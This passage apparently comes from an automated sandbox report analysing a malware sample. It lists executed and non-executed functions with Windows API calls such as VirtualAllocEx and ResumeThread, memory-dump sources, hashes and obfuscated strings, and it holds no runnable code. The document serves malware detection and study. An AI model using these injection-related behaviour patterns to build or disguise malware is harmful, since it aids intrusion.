                                                                                            • Instruction Fuzzy Hash: D511E4B69002099FDB10CF9AD844ADEFBF4FB48710F14852AE525AB600C375A545CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0157BEC0 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0157BD21,00000800,00000000,00000000), ref: 0157BF32
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: aaa167e0bd46043053e2c7e998c58aca3f522225a9f15a1c1ff16ed68003321f
                                                                                            • Instruction ID: 9590e8055a32c42453b9d20768b70340a610793b3a3774f4a98fd25ff2d82f10
                                                                                            • Opcode Fuzzy Hash: aaa167e0bd46043053e2c7e998c58aca3f522225a9f15a1c1ff16ed68003321f
                                                                                            • Instruction Fuzzy Hash: 9D1114B29002099FDB10CFAAD844ADEFBF4FB48710F10852AE565AB200C775A545CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02ECD6D8 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02ECD743
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 9e7a41392e21d4e5451cec2f6ae11de7f3eab91f4b2236d33c8af5458238bd25
                                                                                            • Instruction ID: c6148dc148ab58cb8329af035a3154733954fbd0b9cee0e597614c35bee3b717
                                                                                            • Opcode Fuzzy Hash: 9e7a41392e21d4e5451cec2f6ae11de7f3eab91f4b2236d33c8af5458238bd25
                                                                                            • Instruction Fuzzy Hash: 5811F2B59002499FCB10CF9AC984BDEBFF4FB88324F208429E529A7210D775A944CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0157BC40 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0157BCA6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 39af6968e42ee0fcbec2bbd09d496b9dde9322d884b1fdc977b49814c67514c5
                                                                                            • Instruction ID: 8b018b8fe5d0d7acd3a4ec0053280ca0e27fa82e8d9c7809e92270f891e5f0f3
                                                                                            • Opcode Fuzzy Hash: 39af6968e42ee0fcbec2bbd09d496b9dde9322d884b1fdc977b49814c67514c5
                                                                                            • Instruction Fuzzy Hash: 7A11E3B5C002498FDB10CF9AD544ADEFBF8EF88324F14842AD559B7600D774A545CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02ECDD70 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 02ECDDCD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost
                                                                                            • String ID:
                                                                                            • API String ID: 410705778-0
                                                                                            • Opcode ID: dd7798ff1a3eeb6da3bc5580f3511540b58ca41b6c45436b640c2fa01f5be375
                                                                                            • Instruction ID: 1b2586d748304406a109caf6ec51357237e1586d67adcc825907a1cf148e779d
                                                                                            • Opcode Fuzzy Hash: dd7798ff1a3eeb6da3bc5580f3511540b58ca41b6c45436b640c2fa01f5be375
                                                                                            • Instruction Fuzzy Hash: D41112B58003099FDB10CF9AC984BDEBFF8EB48324F20841AE555A7600C375A984CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0157E159 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetWindowLongW.USER32(?,?,?), ref: 0157E1BD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: LongWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1378638983-0
                                                                                            • Opcode ID: d4046bbb8534e1f1218ec21f95b7f020c933a039d906d8379f26afdf31b42aad
                                                                                            • Instruction ID: 1f9de487846de32408a7a7440c12a8ca5a236a0113815e095b22fd321bc0ec21
                                                                                            • Opcode Fuzzy Hash: d4046bbb8534e1f1218ec21f95b7f020c933a039d906d8379f26afdf31b42aad
                                                                                            • Instruction Fuzzy Hash: 3A1103B69003098FDB10CF99D585BDEBBF4EB48320F24845AD955B7700C378A944CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0157E160 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetWindowLongW.USER32(?,?,?), ref: 0157E1BD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: LongWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1378638983-0
                                                                                            • Opcode ID: f0aaf994fbd6fc12b2cca47fdf3d0e990216771918d72efaa089ed646f440890
                                                                                            • Instruction ID: 49e4863928e8f4e0b1e3ca0a1c675dda624cb41ca0a7addc574a4465475691d0
                                                                                            • Opcode Fuzzy Hash: f0aaf994fbd6fc12b2cca47fdf3d0e990216771918d72efaa089ed646f440890
                                                                                            • Instruction Fuzzy Hash: 4B11D0B59003099FDB10CF9AD985BDEBBF8EB88320F20845AD955A7740C374A944CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02ECDA50 Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: 005961d017b6502d74e433a9cabf05c6a303a61e39fd478b6e9820fd98ec0960
                                                                                            • Instruction ID: 4ef797a41a16a07aedeb92462b7543f21cfc5e973c7169b74e9d8e24f3b3a8da
                                                                                            • Opcode Fuzzy Hash: 005961d017b6502d74e433a9cabf05c6a303a61e39fd478b6e9820fd98ec0960
                                                                                            • Instruction Fuzzy Hash: 6E1112B18002098FCB10CF9AC984BDEBBF4EB48324F20846AD519B7200C775A944CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014FD4D8 Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.427031259.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14fd000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6064e01e4a3e0647fb6e303a0585748b0114a863c8869f81825733ffa734d66f
                                                                                            • Instruction ID: 77bd584f468a4b07f3e718fc65dc002bd00eec19318a6506f2d63a0b8266f11f
                                                                                            • Opcode Fuzzy Hash: 6064e01e4a3e0647fb6e303a0585748b0114a863c8869f81825733ffa734d66f
                                                                                            • Instruction Fuzzy Hash: B8210A71904244DFDB05DF98D9C4B17BF65FB88328F24856EDA050B326C336D856D7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0150D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.427484467.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_150d000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 627523067bb74502a7a7c4c0a6c03d8a12c997bf8e4b0461ee9752e12d08869d
                                                                                            • Instruction ID: c7f38e4367ab1ec7432f69866f0235a52bab535c73763023f1c70da45c9c78f3
                                                                                            • Opcode Fuzzy Hash: 627523067bb74502a7a7c4c0a6c03d8a12c997bf8e4b0461ee9752e12d08869d
                                                                                            • Instruction Fuzzy Hash: 4E21F571504241EFDB06DFD8D5C0B2ABBB5FB84324F24CA6DE8494F286C736D846CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0150D01C Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.427484467.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_150d000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2f3646806f36dee003475a0a4371570d64e7c0b23b3f139844a27c6d0d1303d1
                                                                                            • Instruction ID: 7685149c601b1ac0aae65557644085833dca098229ef4ad94ba9a245e5cdb14d
                                                                                            • Opcode Fuzzy Hash: 2f3646806f36dee003475a0a4371570d64e7c0b23b3f139844a27c6d0d1303d1
                                                                                            • Instruction Fuzzy Hash: E221F1756042409FDB16CFD8D8D0B16BBA5FB84364F20C969D84A4F286D336D846CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0150D006 Relevance: .1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.427484467.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_150d000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e1297555f1a0a4b7627031d3da55caddfc4218f1b316ea121ea417802b375c1f
                                                                                            • Instruction ID: 0cb004227c35d7d86c37449c06df7a16c7d73d8614677f1e8da499147ece0963
                                                                                            • Opcode Fuzzy Hash: e1297555f1a0a4b7627031d3da55caddfc4218f1b316ea121ea417802b375c1f
                                                                                            • Instruction Fuzzy Hash: 5E2180755093808FDB03CFA4D990B15BF71FB46214F28C5EAD8498F697C33A984ACB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014FD4D3 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.427031259.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14fd000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                            • Instruction ID: 866cc4290cb14b585d0ea6f5137cb499ec74e514fc7a5f5e847e09b09982cb71
                                                                                            • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                            • Instruction Fuzzy Hash: 2811D376904280CFDB16CF54D5C4B16BF71FB84324F2486AED9050B72AC33AD456CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0150D1CF Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.427484467.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_150d000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                                                            • Instruction ID: b08e2730257bbb40d96ed3b63e82de44089d2614a25e4e5c9cbb5b3cb7a19aa5
                                                                                            • Opcode Fuzzy Hash: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                                                            • Instruction Fuzzy Hash: 4C11BB75904280DFDB02CF98C6C0B19BBB1FB84324F28C6ADD8494F696C33AD44ACB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014FD75D Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.427031259.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14fd000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 208bc6342dafbef95b700611c890d227d8e7bcbacfab2f87328dff6e61edfd18
                                                                                            • Instruction ID: eb82503b48fa18044dbd1887f3b7e34d1a08112124f86f52b78c7a533a4b8f2c
                                                                                            • Opcode Fuzzy Hash: 208bc6342dafbef95b700611c890d227d8e7bcbacfab2f87328dff6e61edfd18
                                                                                            • Instruction Fuzzy Hash: C401F2319083C0AEE7108E99CC84B67BFD8EF41620F18841FEE455F366C3789844C6B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014FD75C Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.427031259.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14fd000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0c29d6096b8ed137b542024f832bab0826f236b76402db6968c2e62070501813
                                                                                            • Instruction ID: 652f452f493b4104e3b9f9838621fa988139502a735519f8297b83ee931abed4
                                                                                            • Opcode Fuzzy Hash: 0c29d6096b8ed137b542024f832bab0826f236b76402db6968c2e62070501813
                                                                                            • Instruction Fuzzy Hash: 09F04F719042849EE7118A59CC84B63FFE8EF81624F18855EEE485F396C3789844CAB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 02EC1D50 Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: )]"]$)]"]$r6l
                                                                                            • API String ID: 0-3320770255
                                                                                            • Opcode ID: e285c187b640522f1e76b75eefd20a9c50ab57d5a7b661a3b4b16c394cae9fb6
                                                                                            • Instruction ID: 187d386ff4249701dec1515d755f1d99d0139d5ed1702744c0751a2716c396eb
                                                                                            • Opcode Fuzzy Hash: e285c187b640522f1e76b75eefd20a9c50ab57d5a7b661a3b4b16c394cae9fb6
                                                                                            • Instruction Fuzzy Hash: 7A811174A14219DFCB04CFA9C6849AEFBF2FF89310F24946AD419AB355D330AA42CF51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02EC1D41 Relevance: 3.9, Strings: 3, Instructions: 188COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: )]"]$)]"]$r6l
                                                                                            • API String ID: 0-3320770255
                                                                                            • Opcode ID: b1c202501435cb844aee421f03a0e847b5c7e2702bf05bcd132f37d7084a076f
                                                                                            • Instruction ID: a619b3ba6437f2655351a602cc54e50172d4c435725d16acb9edd574a59014e4
                                                                                            • Opcode Fuzzy Hash: b1c202501435cb844aee421f03a0e847b5c7e2702bf05bcd132f37d7084a076f
                                                                                            • Instruction Fuzzy Hash: D9810474A15209DFCB04CFA9C6849AEFBF2FF89310F24956AD419AB351D730AA42CF51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02EC3188 Relevance: 2.7, Strings: 2, Instructions: 161COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: KY,$KY,
                                                                                            • API String ID: 0-1625539038
                                                                                            • Opcode ID: b5ee3d91f0a7f0e0c839a5c1088c6bb884e14eeeb1cddbb9af4cf6c1813dc8e0
                                                                                            • Instruction ID: 44bfe8feb2a8d7b4e57c5a75140abbfbd7661475ba94d093e8b0dc9d1878c3cd
                                                                                            • Opcode Fuzzy Hash: b5ee3d91f0a7f0e0c839a5c1088c6bb884e14eeeb1cddbb9af4cf6c1813dc8e0
                                                                                            • Instruction Fuzzy Hash: 0661E574E55219CFCB08CFAACA815DEFBF2BB89210F24E56AD415B7314D7309A42CB64
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02EC28C8 Relevance: 2.7, Strings: 2, Instructions: 160COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: dn8%$dn8%
                                                                                            • API String ID: 0-1893559865
                                                                                            • Opcode ID: 469650c6daf126de9f7e690cc39e28eaba3d6a7840e92ffbab8e21fbc4d42dc2
                                                                                            • Instruction ID: 7b4ff8ace474c0856f7da2a63ec73dce72dfade5496411d94e32e231f4efd884
                                                                                            • Opcode Fuzzy Hash: 469650c6daf126de9f7e690cc39e28eaba3d6a7840e92ffbab8e21fbc4d42dc2
                                                                                            • Instruction Fuzzy Hash: 2771DF74D4021ACFCB08CF99D6809EEFBB1BF48350F24E55AD915AB214D334AA42CF95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02EC8BA8 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: +1
                                                                                            • API String ID: 0-2008424990
                                                                                            • Opcode ID: d759b7beb19ebd71583bda52ffe1797e00d9e330e69b37ac91bfa7b0d3399ac7
                                                                                            • Instruction ID: 5e8f183dde49bfbf0abb523897ea9d56d63ab09a8f3993d67e40ab76e6a39819
                                                                                            • Opcode Fuzzy Hash: d759b7beb19ebd71583bda52ffe1797e00d9e330e69b37ac91bfa7b0d3399ac7
                                                                                            • Instruction Fuzzy Hash: B0912B74E112198FDB14CFA9CA80AADFBB2FF89300F24D1AAD509A7355D7309982CF51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02EC8B98 Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: +1
                                                                                            • API String ID: 0-2008424990
                                                                                            • Opcode ID: feaf5e8f002c838c1ef521b703ab5536014afd6f3a2e654867a8c9a76f3b5b62
                                                                                            • Instruction ID: 8a1e3a25f3908a101c809e99a66da34a075e231d197278300e9149dfc84034ce
                                                                                            • Opcode Fuzzy Hash: feaf5e8f002c838c1ef521b703ab5536014afd6f3a2e654867a8c9a76f3b5b62
                                                                                            • Instruction Fuzzy Hash: F2912A74E152198FDB14CFA9CA80BADFBB2BF89300F24D1AAD509A7355D7309982CF51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02ECB628 Relevance: 1.4, Strings: 1, Instructions: 165COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: *Be
                                                                                            • API String ID: 0-1292722480
                                                                                            • Opcode ID: 248c0dc19bf29d5ad7811931c164144e88fc0592118651f8bba6ec59d5482714
                                                                                            • Instruction ID: 424f7ad52f6fd04661f02811d0bb8be76c28d5a1934cf9f3aac9d2a9918be143
                                                                                            • Opcode Fuzzy Hash: 248c0dc19bf29d5ad7811931c164144e88fc0592118651f8bba6ec59d5482714
                                                                                            • Instruction Fuzzy Hash: 5461E274E59209CBCB08DFE9D5555EEFBB2EB89300F20A42ED406B7254DB349A42CF94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02EC3178 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: KY,
                                                                                            • API String ID: 0-3270746851
                                                                                            • Opcode ID: 865d03c4d54351aebb5d934abe8186594da72975ac0476a066f59ca5415cece3
                                                                                            • Instruction ID: c05fd301ca944209fa4025a0edc7ab955341f62d6cdb0eda952ece2ec8badd62
                                                                                            • Opcode Fuzzy Hash: 865d03c4d54351aebb5d934abe8186594da72975ac0476a066f59ca5415cece3
                                                                                            • Instruction Fuzzy Hash: 3861E274E552198FCB08CFA9CA815DEFBF2BF89210F24E5AAD405B7314D7309A42CB64
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02EC2BC8 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: NvQ
                                                                                            • API String ID: 0-3763128010
                                                                                            • Opcode ID: cf715b342f79f05010d49e3e888787d6c4b3644f8a33c7e3421176080eaa1c63
                                                                                            • Instruction ID: dca250726342bfd954e53060fa63e067c2bafecac1b18ed56cfd52b3162a42f9
                                                                                            • Opcode Fuzzy Hash: cf715b342f79f05010d49e3e888787d6c4b3644f8a33c7e3421176080eaa1c63
                                                                                            • Instruction Fuzzy Hash: C96109B0D44609DFDB04CFE5C9819EEFBB2BB48300F24E46AD515A7214D734AA82CF94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02EC2BB9 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: NvQ
                                                                                            • API String ID: 0-3763128010
                                                                                            • Opcode ID: 5d6fabcb8250864e4194689214e5c2068b68dd50d8c0d94f7f6f23ee80d133e3
                                                                                            • Instruction ID: aa95a75fb1706fad35a7f24fc5d4edeee472bedaaedd3b0efc4b26b661de0a21
                                                                                            • Opcode Fuzzy Hash: 5d6fabcb8250864e4194689214e5c2068b68dd50d8c0d94f7f6f23ee80d133e3
                                                                                            • Instruction Fuzzy Hash: 7D61F9B4D4460A9FDB04CFE5CA419EEFBB2BF49300F24E46AD515A7250D7349A82CF94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02ECBB78 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PSGH
                                                                                            • API String ID: 0-1133269047
                                                                                            • Opcode ID: 662a224d47239c1f8bde0d93d3e1d1b33911118f8d7ddbbae467eb9b6ace4e32
                                                                                            • Instruction ID: 90a8dd1f72421aea28e89db2fd5c28ff2e18c58ec66a44634c77b8699cf7a180
                                                                                            • Opcode Fuzzy Hash: 662a224d47239c1f8bde0d93d3e1d1b33911118f8d7ddbbae467eb9b6ace4e32
                                                                                            • Instruction Fuzzy Hash: 4C611B71E5562A8BDB28CF66C9447E9BBF2AF89300F14D1FAD40DA7214EB305A81CF40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02EC4110 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
